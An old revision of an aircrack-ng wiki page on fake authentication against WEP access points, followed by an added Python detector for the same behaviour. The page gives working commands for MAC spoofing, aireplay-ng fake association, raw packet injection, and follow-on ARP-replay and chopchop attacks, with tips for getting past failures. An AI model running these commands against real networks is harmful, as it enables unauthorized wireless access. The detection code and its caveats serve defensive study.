This is an old revision of the document!

Fake authentication

This attack is only useful when you need an associated MAC address for attacks 2, 3 and 4 (the -h option) and there is currently no associated client. However, it is generally better to use the MAC address of a real client (like here, 00:09:5B:EB:C5:2B) in attacks 2, 3 and 4. The fake auth attack does NOT generate ARP requests.

Also, subsequent attacks will likely perform better if you update the MAC address of the card, so that it properly sends ACKs:

ifconfig ath0 down
ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up
aireplay-ng -1 0 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
12:14:06  Sending Authentication Request
12:14:06  Authentication successful
12:14:06  Sending Association Request
12:14:07  Association successful :-)

With patched madwifi-old CVS 2005-08-14, it's possible to inject packets while in Managed mode (the WEP key itself doesn't matter, as long as the AP accepts Open-System authentication). So, instead of running attack 1, you may just associate and inject / monitor through the athXraw interface:

ifconfig ath0 down hw ether 00:11:22:33:44:55
iwconfig ath0 mode Managed essid 'the ssid' key AAAAAAAAAA
ifconfig ath0 up
sysctl -w dev.ath0.rawdev=1
ifconfig ath0raw up
airodump-ng ath0raw out 6

Then you can run attack 3 or 4 (aireplay-ng will automatically replace ath0 with ath0raw below):

aireplay-ng -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0
aireplay-ng -4 -h 00:10:20:30:40:50 -f 1 ath0

Some access points require the client to reassociate every 30 seconds; otherwise our fake client is considered disconnected. In this case, set the periodic re-association delay:

aireplay-ng -1 30 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
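The behaviour described above (an authentication followed by an association, repeated on a fixed timer, from a station that never sends data frames because fake auth generates no ARP requests) is exactly what an access point or wireless IDS can look for. The following detector is an added example written for this page, not code from the aircrack-ng project. It runs over constructed management-frame events; the one-event-per-line format is an assumption made for the example, and the MAC addresses are the ones used on this page.

```python
# Added example (not from the aircrack-ng wiki): a small detector for the
# station behaviour the page describes, run over constructed management-frame
# events. Real input would come from a WIDS or an AP's association log; the
# line format below is an assumption made for this example.
from collections import defaultdict
from statistics import mean

# Constructed sample: "<seconds> <frame> <station MAC> <BSSID>".
# 00:11:22:33:44:55 behaves like the page's fake client re-associating every
# 30 s without ever sending data; 00:09:5B:EB:C5:2B behaves like a real client.
SAMPLE_EVENTS = """\
0  AUTH  00:11:22:33:44:55 00:13:10:30:24:9C
0  ASSOC 00:11:22:33:44:55 00:13:10:30:24:9C
5  AUTH  00:09:5B:EB:C5:2B 00:13:10:30:24:9C
5  ASSOC 00:09:5B:EB:C5:2B 00:13:10:30:24:9C
7  DATA  00:09:5B:EB:C5:2B 00:13:10:30:24:9C
30 AUTH  00:11:22:33:44:55 00:13:10:30:24:9C
30 ASSOC 00:11:22:33:44:55 00:13:10:30:24:9C
41 DATA  00:09:5B:EB:C5:2B 00:13:10:30:24:9C
60 AUTH  00:11:22:33:44:55 00:13:10:30:24:9C
61 ASSOC 00:11:22:33:44:55 00:13:10:30:24:9C
90 AUTH  00:11:22:33:44:55 00:13:10:30:24:9C
90 ASSOC 00:11:22:33:44:55 00:13:10:30:24:9C
"""


def parse_events(text):
    """Parse event lines into (time, frame, station, bssid) tuples, sorted by time."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip blank or malformed lines
        t, frame, station, bssid = parts
        events.append((float(t), frame.upper(), station.upper(), bssid.upper()))
    events.sort(key=lambda e: e[0])
    return events


def analyze(events, min_assocs=3, max_jitter=2.0):
    """Return {station: findings} for stations showing fake-auth indicators.

    periodic_reassociation: at least min_assocs association frames whose gaps
        all lie within max_jitter seconds of each other (aireplay-ng -1 <delay>
        re-associates on a fixed timer); the value is the mean gap in seconds.
    no_data_after_association: the station associated but never sent a data
        frame, matching the page's note that fake auth generates no ARP traffic.
    """
    assoc_times = defaultdict(list)
    sent_data = set()
    for t, frame, station, _bssid in events:
        if frame == "ASSOC":
            assoc_times[station].append(t)
        elif frame == "DATA":
            sent_data.add(station)

    findings = {}
    for station, times in assoc_times.items():
        f = {}
        if len(times) >= min_assocs:
            gaps = [b - a for a, b in zip(times, times[1:])]
            if max(gaps) - min(gaps) <= max_jitter:
                f["periodic_reassociation"] = round(mean(gaps), 1)
        if station not in sent_data:
            f["no_data_after_association"] = True
        if f:
            findings[station] = f
    return findings


if __name__ == "__main__":
    for station, f in analyze(parse_events(SAMPLE_EVENTS)).items():
        print(station, f)
```

Two caveats follow directly from the page. First, the "no data" indicator only catches a fake client using its own MAC; when the attacker uses the MAC of a real client, as the page recommends, the real station's data frames mask it, and only the fixed re-association timer remains visible. Second, a legitimate client that has just associated and is still idle also has no data frames yet, so in practice the check should be evaluated over a window rather than immediately after association.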

If this attack seems to fail (aireplay-ng keeps sending authentication requests), MAC address filtering may be in place. Also make sure that:

  • You are close enough to the access point.
  • The driver is properly patched and installed.
  • The card is configured on the same channel as the AP.
  • The BSSID and ESSID (-a / -e options) are correct.
  • If the card is a Prism2, make sure the firmware was updated.
fake_authentication.1163949138.txt.gz · Last modified: 2007/02/27 22:07 (external edit)